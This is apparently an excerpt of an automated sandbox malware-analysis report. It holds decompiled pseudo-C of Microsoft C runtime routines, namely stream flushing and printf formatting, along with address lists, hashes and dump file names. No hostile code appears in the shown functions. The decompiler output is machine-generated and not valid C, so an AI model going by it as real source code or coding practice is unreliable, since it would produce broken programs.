					 *( *(_t190 - 8)) =  *((intOrPtr*)( *(_t190 - 8) + 8));
					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) & 0xfffffffe;
					goto L5;
				}
			}

0x0041f059
0x0041f0a3
0x0041f0af
0x0041f0be
0x0041f0c4
0x0041f0cb
0x0041f0d2
0x0041f0d5
0x0041f0e3
0x0041f11b
0x0041f127
0x0041f226
0x0041f241
0x0041f244
0x0041f24a
0x0041f263
0x0041f24c
0x0041f252
0x0041f258
0x0041f25b
0x0041f25b
0x00000000
0x0041f24a
0x0041f138
0x0041f13a
0x0041f13f
0x0041f141
0x0041f146
0x0041f14b
0x0041f14d
0x0041f152
0x0041f158
0x0041f15a
0x0041f15a
0x0041f158
0x0041f166
0x0041f175
0x0041f183
0x0041f18a
0x0041f1ac
0x0041f1cf
0x0041f1b4
0x0041f1ca
0x0041f1ca
0x0041f1d9
0x0041f1dd
0x0041f1e0
0x00000000
0x0041f1e2
0x0041f1e8
0x0041f1f4
0x0041f1f7
0x0041f203
0x00000000
0x00000000
0x0041f20e
0x0041f211
0x0041f214
0x00000000
0x0041f214
0x0041f18c
0x0041f1a3
0x0041f219
0x0041f222
0x00000000
0x0041f222
0x0041f18a
0x0041f0f0
0x0041f0ff
0x0041f103
0x0041f108
0x0041f10d
0x00000000
0x00000000
0x00000000
0x0041f10f
0x0041f10f
0x0041f113
0x0041f118
0x00000000
0x0041f118
0x0041f05b
0x0041f05e
0x0041f06e
0x0041f08c
0x0041f098
0x0041f09b
0x0041f268
0x0041f26b
0x0041f26b
0x0041f079
0x0041f087
0x00000000
0x0041f087

APIs

__isatty.LIBCMTD ref: 0041F103
__getbuf.LIBCMTD ref: 0041F113
__write.LIBCMTD ref: 0041F19B

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 0041F146
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 0041F13A

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __getbuf__isatty__write
String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
API String ID: 2861569966-4070537404
Opcode ID: 9887be6d387c1f48e850d54f0d5faa7ed5d0060e01e400e749dad7b62f711ac6
Instruction ID: 953e4e75b0c3dddcc80244792fdcc3d835717d17f644e0ae33f428ff5de15e10
Opcode Fuzzy Hash: 9887be6d387c1f48e850d54f0d5faa7ed5d0060e01e400e749dad7b62f711ac6
Instruction Fuzzy Hash: 2351DC75A00208EFDB14CF94D491AADFB71FF88324F14C299D8456B396D735AA86CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004224E4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004224E4() {
				signed int _t499;
				void* _t504;
				signed int _t506;
				void* _t526;
				intOrPtr _t528;
				signed int _t536;
				intOrPtr _t555;
				intOrPtr _t556;
				signed int _t557;
				void* _t559;

				L0:
				while(1) {
					L0:
					 *(_t557 - 0x30) = 8;
					while(1) {
						L146:
						 *(__ebp - 0x260) = 7;
						while(1) {
							L148:
							 *(__ebp - 8) = 0x10;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
							__eflags =  *(__ebp - 0x10) & 0x00000080;
							if(( *(__ebp - 0x10) & 0x00000080) != 0) {
								 *(__ebp - 0x14) = 0x30;
								 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
								__eflags =  *(__ebp - 0x260) + 0x51;
								 *((char*)(__ebp - 0x13)) = __al;
								 *(__ebp - 0x1c) = 2;
							}
							while(1) {
								L153:
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
								__eflags =  *(__ebp - 0x10) & 0x00008000;
								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
									__eflags =  *(__ebp - 0x10) & 0x00001000;
									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
										__eflags =  *(__ebp - 0x10) & 0x00000020;
										if(( *(__ebp - 0x10) & 0x00000020) == 0) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
											__eflags =  *(__ebp - 0x10) & 0x00000040;
											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
												__ecx = __ebp + 0x14;
												__eax = E0041F270(__ebp + 0x14);
												__edx = 0;
												__eflags = 0;
												 *(__ebp - 0x2b8) = __eax;
												 *(__ebp - 0x2b4) = 0;
											} else {
												__eax = __ebp + 0x14;
												__eax = E0041F270(__ebp + 0x14);
												asm("cdq");
												 *(__ebp - 0x2b8) = __eax;
												 *(__ebp - 0x2b4) = __edx;
											}
										} else {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
											__eflags =  *(__ebp - 0x10) & 0x00000040;
											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
												__ecx = __ebp + 0x14;
												E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
												asm("cdq");
												 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
												 *(__ebp - 0x2b4) = __edx;
											} else {
												__eax = __ebp + 0x14;
												__eax = E0041F270(__ebp + 0x14);
												__ax = __eax;
												asm("cdq");
												 *(__ebp - 0x2b8) = __eax;
												 *(__ebp - 0x2b4) = __edx;
											}
										}
									} else {
										__eax = __ebp + 0x14;
										 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
										 *(__ebp - 0x2b4) = __edx;
									}
								} else {
									__ecx = __ebp + 0x14;
									 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
									 *(__ebp - 0x2b4) = __edx;
								}
								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
								__eflags =  *(__ebp - 0x10) & 0x00000040;
								if(( *(__ebp - 0x10) & 0x00000040) == 0) {
									goto L170;
								}
								L166:
								__eflags =  *(__ebp - 0x2b4);
								if(__eflags > 0) {
									goto L170;
								}
								L167:
								if(__eflags < 0) {
									L169:
									 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
									__edx =  *(__ebp - 0x2b4);
									asm("adc edx, 0x0");
									__edx =  ~( *(__ebp - 0x2b4));
									 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
									 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
									L171:
									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
									__eflags =  *(__ebp - 0x10) & 0x00008000;
									if(( *(__ebp - 0x10) & 0x00008000) == 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
										__eflags =  *(__ebp - 0x10) & 0x00001000;
										if(( *(__ebp - 0x10) & 0x00001000) == 0) {
											__edx =  *(__ebp - 0x2c0);
											__eax =  *(__ebp - 0x2bc);
											__eax =  *(__ebp - 0x2bc) & 0x00000000;
											__eflags = __eax;
											 *(__ebp - 0x2bc) = __eax;
										}
									}
									__eflags =  *(__ebp - 0x30);
									if( *(__ebp - 0x30) >= 0) {
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
										__eflags =  *(__ebp - 0x30) - 0x200;
										if( *(__ebp - 0x30) > 0x200) {
											 *(__ebp - 0x30) = 0x200;
										}
									} else {
										 *(__ebp - 0x30) = 1;
									}
									 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
									__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
									if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
										 *(__ebp - 0x1c) = 0;
									}
									__eax = __ebp - 0x49;
									 *(__ebp - 4) = __ebp - 0x49;
									while(1) {
										L181:
										__ecx =  *(__ebp - 0x30);
										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
										__eflags =  *(__ebp - 0x30);
										if( *(__ebp - 0x30) > 0) {
											goto L183;
										}
										L182:
										 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
										__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
										if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
											L186:
											__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
											 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
											__ecx =  *(__ebp - 4);
											__ecx =  *(__ebp - 4) + 1;
											 *(__ebp - 4) = __ecx;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
											__eflags =  *(__ebp - 0x10) & 0x00000200;
											if(( *(__ebp - 0x10) & 0x00000200) == 0) {
												while(1) {
													L190:
													__eflags =  *(__ebp - 0x28);
													if( *(__ebp - 0x28) != 0) {
														goto L216;
													}
													L191:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
													__eflags =  *(__ebp - 0x10) & 0x00000040;
													if(( *(__ebp - 0x10) & 0x00000040) != 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
														__eflags =  *(__ebp - 0x10) & 0x00000100;
														if(( *(__ebp - 0x10) & 0x00000100) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
															__eflags =  *(__ebp - 0x10) & 0x00000001;
															if(( *(__ebp - 0x10) & 0x00000001) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
																__eflags =  *(__ebp - 0x10) & 0x00000002;
																if(( *(__ebp - 0x10) & 0x00000002) != 0) {
																	 *(__ebp - 0x14) = 0x20;
																	 *(__ebp - 0x1c) = 1;
																}
															} else {
																 *(__ebp - 0x14) = 0x2b;
																 *(__ebp - 0x1c) = 1;
															}
														} else {
															 *(__ebp - 0x14) = 0x2d;
															 *(__ebp - 0x1c) = 1;
														}
													}
													 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
													 *(__ebp - 0x2c4) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
													__eflags =  *(__ebp - 0x10) & 0x0000000c;
													if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
														__edx = __ebp - 0x24c;
														__eax =  *(__ebp + 8);
														__ecx =  *(__ebp - 0x2c4);
														__eax = E00422C60(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
													}
													__edx = __ebp - 0x24c;
													__eax =  *(__ebp + 8);
													__ecx =  *(__ebp - 0x1c);
													__edx = __ebp - 0x14;
													E00422CA0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x24c) =  *(__ebp - 0x10);
													__eax =  *(__ebp - 0x10) & 0x00000008;
													__eflags =  *(__ebp - 0x10) & 0x00000008;
													if(( *(__ebp - 0x10) & 0x00000008) != 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
														__eflags =  *(__ebp - 0x10) & 0x00000004;
														if(( *(__ebp - 0x10) & 0x00000004) == 0) {
															__edx = __ebp - 0x24c;
															__eax =  *(__ebp + 8);
															__ecx =  *(__ebp - 0x2c4);
															__eax = E00422C60(0x30,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
														}
													}
													__eflags =  *(__ebp - 0xc);
													if( *(__ebp - 0xc) == 0) {
														L212:
														__ecx = __ebp - 0x24c;
														__edx =  *(__ebp + 8);
														__eax =  *(__ebp - 0x24);
														__ecx =  *(__ebp - 4);
														__eax = E00422CA0(__ecx, __ecx,  *(__ebp - 0x24),  *(__ebp + 8), __ebp - 0x24c);
														goto L213;
													} else {
														L204:
														__eflags =  *(__ebp - 0x24);
														if( *(__ebp - 0x24) <= 0) {
															goto L212;
														}
														L205:
														 *(__ebp - 0x2dc) = 0;
														__edx =  *(__ebp - 4);
														 *(__ebp - 0x2c8) =  *(__ebp - 4);
														__eax =  *(__ebp - 0x24);
														 *(__ebp - 0x2cc) =  *(__ebp - 0x24);
														while(1) {
															L206:
															__ecx =  *(__ebp - 0x2cc);
															 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
															 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
															__eflags = __ecx;
															if(__ecx == 0) {
																break;
															}
															L207:
															__eax =  *(__ebp - 0x2c8);
															 *(__ebp - 0x32e) =  *( *(__ebp - 0x2c8));
															__edx =  *(__ebp - 0x32e) & 0x0000ffff;
															__eax = __ebp - 0x2d8;
															__ecx = __ebp - 0x2d0;
															 *(__ebp - 0x2dc) = E00424E90(__ebp - 0x2d0, __ebp - 0x2d8, 6,  *(__ebp - 0x32e) & 0x0000ffff);
															 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
															 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
															__eflags =  *(__ebp - 0x2dc);
															if( *(__ebp - 0x2dc) != 0) {
																L209:
																 *(__ebp - 0x24c) = 0xffffffff;
																break;
															}
															L208:
															__eflags =  *(__ebp - 0x2d0);
															if( *(__ebp - 0x2d0) != 0) {
																L210:
																__eax = __ebp - 0x24c;
																__ecx =  *(__ebp + 8);
																__edx =  *(__ebp - 0x2d0);
																__ebp - 0x2d8 = E00422CA0( *(__ebp + 8), __ebp - 0x2d8,  *(__ebp - 0x2d0),  *(__ebp + 8), __ebp - 0x24c);
																continue;
															}
															goto L209;
														}
														L211:
														L213:
														__eflags =  *(__ebp - 0x24c);
														if( *(__ebp - 0x24c) >= 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
															__eflags =  *(__ebp - 0x10) & 0x00000004;
															if(( *(__ebp - 0x10) & 0x00000004) != 0) {
																__eax = __ebp - 0x24c;
																__ecx =  *(__ebp + 8);
																__edx =  *(__ebp - 0x2c4);
																__eax = E00422C60(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
															}
														}
													}
													L216:
													__eflags =  *(__ebp - 0x20);
													if( *(__ebp - 0x20) != 0) {
														 *(__ebp - 0x20) = L0040F230( *(__ebp - 0x20), 2);
														 *(__ebp - 0x20) = 0;
													}
													while(1) {
														L218:
														 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
														_t547 =  *(_t557 - 0x251);
														 *(_t557 + 0xc) =  *(_t557 + 0xc) + 1;
														if( *(_t557 - 0x251) == 0 ||  *(_t557 - 0x24c) < 0) {
															break;
														} else {
															if( *(_t557 - 0x251) < 0x20 ||  *(_t557 - 0x251) > 0x78) {
																 *(_t557 - 0x310) = 0;
															} else {
																 *(_t557 - 0x310) =  *( *(_t557 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
															}
														}
														L7:
														 *(_t557 - 0x250) =  *(_t557 - 0x310);
														_t506 =  *(_t557 - 0x250) * 9;
														_t536 =  *(_t557 - 0x25c);
														_t547 = ( *(_t506 + _t536 + 0x4081a0) & 0x000000ff) >> 4;
														 *(_t557 - 0x25c) = ( *(_t506 + _t536 + 0x4081a0) & 0x000000ff) >> 4;
														if( *(_t557 - 0x25c) != 8) {
															L16:
															 *(_t557 - 0x318) =  *(_t557 - 0x25c);
															__eflags =  *(_t557 - 0x318) - 7;
															if( *(_t557 - 0x318) > 7) {
																continue;
															}
															L17:
															switch( *((intOrPtr*)( *(_t557 - 0x318) * 4 +  &M00422AB0))) {
																case 0:
																	L18:
																	 *(_t557 - 0xc) = 0;
																	_t509 = E00420DA0( *(_t557 - 0x251) & 0x000000ff, E004103A0(_t557 - 0x40));
																	_t562 = _t559 + 8;
																	__eflags = _t509;
																	if(_t509 == 0) {
																		L24:
																		E00422BC0( *(_t557 - 0x251) & 0x000000ff,  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
																		_t559 = _t562 + 0xc;
																		goto L218;
																	} else {
																		E00422BC0( *((intOrPtr*)(_t557 + 8)),  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
																		_t562 = _t562 + 0xc;
																		_t541 =  *( *(_t557 + 0xc));
																		 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
																		_t547 =  *(_t557 + 0xc) + 1;
																		__eflags = _t547;
																		 *(_t557 + 0xc) = _t547;
																		asm("sbb eax, eax");
																		 *(_t557 - 0x27c) =  ~( ~( *(_t557 - 0x251)));
																		if(_t547 == 0) {
																			_push(L"(ch != _T(\'\\0\'))");
																			_push(0);
																			_push(0x486);
																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																			_push(2);
																			_t521 = L0040C820();
																			_t562 = _t562 + 0x14;
																			__eflags = _t521 - 1;
																			if(_t521 == 1) {
																				asm("int3");
																			}
																		}
																		L22:
																		__eflags =  *(_t557 - 0x27c);
																		if( *(_t557 - 0x27c) != 0) {
																			goto L24;
																		} else {
																			 *((intOrPtr*)(L00411810(_t541))) = 0x16;
																			E0040C660(_t528, _t541, _t555, _t556, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
																			 *(_t557 - 0x2f4) = 0xffffffff;
																			E00410370(_t557 - 0x40);
																			_t499 =  *(_t557 - 0x2f4);
																			goto L229;
																		}
																	}
																case 1:
																	L25:
																	 *(__ebp - 0x2c) = 0;
																	__edx =  *(__ebp - 0x2c);
																	 *(__ebp - 0x28) =  *(__ebp - 0x2c);
																	__eax =  *(__ebp - 0x28);
																	 *(__ebp - 0x18) =  *(__ebp - 0x28);
																	__ecx =  *(__ebp - 0x18);
																	 *(__ebp - 0x1c) = __ecx;
																	 *(__ebp - 0x10) = 0;
																	 *(__ebp - 0x30) = 0xffffffff;
																	 *(__ebp - 0xc) = 0;
																	goto L218;
																case 2:
																	L26:
																	__edx =  *((char*)(__ebp - 0x251));
																	 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
																	 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																	 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
																	__eflags =  *(__ebp - 0x31c) - 0x10;
																	if( *(__ebp - 0x31c) > 0x10) {
																		goto L33;
																	}
																	L27:
																	__ecx =  *(__ebp - 0x31c);
																	_t72 = __ecx + 0x422ae8; // 0x498d04
																	__edx =  *_t72 & 0x000000ff;
																	switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00422AD0))) {
																		case 0:
																			goto L30;
																		case 1:
																			goto L31;
																		case 2:
																			goto L29;
																		case 3:
																			goto L28;
																		case 4:
																			goto L32;
																		case 5:
																			goto L33;
																	}
																case 3:
																	L34:
																	__edx =  *((char*)(__ebp - 0x251));
																	__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
																	if( *((char*)(__ebp - 0x251)) != 0x2a) {
																		__eax =  *(__ebp - 0x18);
																		__eax =  *(__ebp - 0x18) * 0xa;
																		__eflags = __eax;
																		__ecx =  *((char*)(__ebp - 0x251));
																		_t96 = __ecx - 0x30; // -48
																		__edx = __eax + _t96;
																		 *(__ebp - 0x18) = __eax + _t96;
																	} else {
																		__eax = __ebp + 0x14;
																		 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																		__eflags =  *(__ebp - 0x18);
																		if( *(__ebp - 0x18) < 0) {
																			__ecx =  *(__ebp - 0x10);
																			__ecx =  *(__ebp - 0x10) | 0x00000004;
																			__eflags = __ecx;
																			 *(__ebp - 0x10) = __ecx;
																			 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																			 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																		}
																	}
																	goto L218;
																case 4:
																	L40:
																	 *(__ebp - 0x30) = 0;
																	goto L218;
																case 5:
																	L41:
																	__eax =  *((char*)(__ebp - 0x251));
																	__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
																	if( *((char*)(__ebp - 0x251)) != 0x2a) {
																		__edx =  *(__ebp - 0x30);
																		__edx =  *(__ebp - 0x30) * 0xa;
																		__eflags = __edx;
																		_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
																		__ecx = __edx + _t107;
																		 *(__ebp - 0x30) = __ecx;
																	} else {
																		__ecx = __ebp + 0x14;
																		 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																		__eflags =  *(__ebp - 0x30);
																		if( *(__ebp - 0x30) < 0) {
																			 *(__ebp - 0x30) = 0xffffffff;
																		}
																	}
																	goto L218;
																case 6:
																	L47:
																	__edx =  *((char*)(__ebp - 0x251));
																	 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
																	 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																	 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																	__eflags =  *(__ebp - 0x320) - 0x2e;
																	if( *(__ebp - 0x320) > 0x2e) {
																		L70:
																		goto L218;
																	}
																	L48:
																	__ecx =  *(__ebp - 0x320);
																	_t115 = __ecx + 0x422b10; // 0x231e9003
																	__edx =  *_t115 & 0x000000ff;
																	switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M00422AFC))) {
																		case 0:
																			L53:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc));
																			__eflags =  *( *(__ebp + 0xc)) - 0x36;
																			if( *( *(__ebp + 0xc)) != 0x36) {
																				L56:
																				__edx =  *(__ebp + 0xc);
																				__eax =  *( *(__ebp + 0xc));
																				__eflags =  *( *(__ebp + 0xc)) - 0x33;
																				if( *( *(__ebp + 0xc)) != 0x33) {
																					L59:
																					__edx =  *(__ebp + 0xc);
																					__eax =  *( *(__ebp + 0xc));
																					__eflags =  *( *(__ebp + 0xc)) - 0x64;
																					if( *( *(__ebp + 0xc)) == 0x64) {
																						L65:
																						L67:
																						goto L70;
																					}
																					L60:
																					__ecx =  *(__ebp + 0xc);
																					__edx =  *__ecx;
																					__eflags =  *__ecx - 0x69;
																					if( *__ecx == 0x69) {
																						goto L65;
																					}
																					L61:
																					__eax =  *(__ebp + 0xc);
																					__ecx =  *( *(__ebp + 0xc));
																					__eflags = __ecx - 0x6f;
																					if(__ecx == 0x6f) {
																						goto L65;
																					}
																					L62:
																					__edx =  *(__ebp + 0xc);
																					__eax =  *( *(__ebp + 0xc));
																					__eflags =  *( *(__ebp + 0xc)) - 0x75;
																					if( *( *(__ebp + 0xc)) == 0x75) {
																						goto L65;
																					}
																					L63:
																					__ecx =  *(__ebp + 0xc);
																					__edx =  *__ecx;
																					__eflags =  *__ecx - 0x78;
																					if( *__ecx == 0x78) {
																						goto L65;
																					}
																					L64:
																					__eax =  *(__ebp + 0xc);
																					__ecx =  *( *(__ebp + 0xc));
																					__eflags = __ecx - 0x58;
																					if(__ecx != 0x58) {
																						 *(__ebp - 0x25c) = 0;
																						goto L18;
																					}
																					goto L65;
																				}
																				L57:
																				__ecx =  *(__ebp + 0xc);
																				__edx =  *((char*)(__ecx + 1));
																				__eflags =  *((char*)(__ecx + 1)) - 0x32;
																				if( *((char*)(__ecx + 1)) != 0x32) {
																					goto L59;
																				} else {
																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																					 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																					__ecx =  *(__ebp - 0x10);
																					__ecx =  *(__ebp - 0x10) & 0xffff7fff;
																					 *(__ebp - 0x10) = __ecx;
																					goto L67;
																				}
																			}
																			L54:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *((char*)(__ecx + 1));
																			__eflags =  *((char*)(__ecx + 1)) - 0x34;
																			if( *((char*)(__ecx + 1)) != 0x34) {
																				goto L56;
																			} else {
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) | 0x00008000;
																				 *(__ebp - 0x10) = __ecx;
																				goto L67;
																			}
																		case 1:
																			L68:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																			goto L70;
																		case 2:
																			L49:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc));
																			__eflags = __ecx - 0x6c;
																			if(__ecx != 0x6c) {
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) | 0x00000010;
																				__eflags = __ecx;
																				 *(__ebp - 0x10) = __ecx;
																			} else {
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																			}
																			goto L70;
																		case 3:
																			L69:
																			__eax =  *(__ebp - 0x10);
																			__eax =  *(__ebp - 0x10) | 0x00000800;
																			__eflags = __eax;
																			 *(__ebp - 0x10) = __eax;
																			goto L70;
																		case 4:
																			goto L70;
																	}
																case 7:
																	L71:
																	__ecx =  *((char*)(__ebp - 0x251));
																	 *(__ebp - 0x324) = __ecx;
																	 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
																	 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
																	__eflags =  *(__ebp - 0x324) - 0x37;
																	if( *(__ebp - 0x324) > 0x37) {
																		while(1) {
																			L190:
																			__eflags =  *(__ebp - 0x28);
																			if( *(__ebp - 0x28) != 0) {
																				goto L216;
																			}
																			goto L191;
																		}
																	}
																	L72:
																	_t156 =  *(__ebp - 0x324) + 0x422b7c; // 0xcccccc0d
																	__ecx =  *_t156 & 0x000000ff;
																	switch( *((intOrPtr*)(__ecx * 4 +  &M00422B40))) {
																		case 0:
																			L123:
																			 *(__ebp - 0x2c) = 1;
																			__ecx =  *((char*)(__ebp - 0x251));
																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
																			__eflags = __ecx;
																			 *((char*)(__ebp - 0x251)) = __cl;
																			goto L124;
																		case 1:
																			L73:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			__eflags =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				__eax =  *(__ebp - 0x10);
																				__eax =  *(__ebp - 0x10) | 0x00000800;
																				__eflags = __eax;
																				 *(__ebp - 0x10) = __eax;
																			}
																			goto L75;
																		case 2:
																			L88:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			__eflags =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				__ecx =  *(__ebp - 0x10);
																				__ecx =  *(__ebp - 0x10) | 0x00000800;
																				__eflags = __ecx;
																				 *(__ebp - 0x10) = __ecx;
																			}
																			goto L90;
																		case 3:
																			L146:
																			 *(__ebp - 0x260) = 7;
																			goto L148;
																		case 4:
																			L81:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x288) = E0041F270(__ebp + 0x14);
																			__eflags =  *(__ebp - 0x288);
																			if( *(__ebp - 0x288) == 0) {
																				L83:
																				__edx =  *0x4bc060; // 0x408114
																				 *(__ebp - 4) = __edx;
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				L87:
																				goto L190;
																			}
																			L82:
																			__ecx =  *(__ebp - 0x288);
																			__eflags =  *(__ecx + 4);
																			if( *(__ecx + 4) != 0) {
																				L84:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																				__eflags =  *(__ebp - 0x10) & 0x00000800;
																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																					 *(__ebp - 0xc) = 0;
																					__edx =  *(__ebp - 0x288);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x288);
																					__edx =  *__ecx;
																					 *(__ebp - 0x24) =  *__ecx;
																				} else {
																					__edx =  *(__ebp - 0x288);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x288);
																					__eax =  *__ecx;
																					asm("cdq");
																					 *__ecx - __edx =  *__ecx - __edx >> 1;
																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																					 *(__ebp - 0xc) = 1;
																				}
																				goto L87;
																			}
